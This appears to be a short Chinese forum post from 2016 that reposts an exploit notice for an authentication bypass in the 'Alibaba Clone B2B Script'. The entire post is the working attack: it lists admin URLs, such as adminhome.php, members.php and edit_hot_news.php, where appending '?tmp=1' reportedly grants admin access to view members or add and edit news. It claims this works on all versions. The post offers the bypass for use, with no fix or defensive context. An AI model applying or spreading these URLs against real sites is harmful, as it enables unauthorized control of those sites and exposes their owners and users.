具体的自己看下
[PHP] 纯文本查看 复制代码
# Exploit Title: Alibaba Clone B2B Script Admin Authentication Bypass
# Vendor Homepage: [url]http://alibaba-clone.com/[/url]
# Version: All Versions
Exploit :
For enter , simply enter the following code
http://server/admin/adminhome.php?tmp=1
For each page is enough to add the following code to the end of url
example see page members :
http://server/admin/members.php?tmp=1
or add a new news :
http://server/admin/hot_news_menu.php?tmp=1
or edit news :
http://server/admin/edit_hot_news.php?hotnewsid=44&tmp=1 | 
发表于 2016-5-5 13:09:52
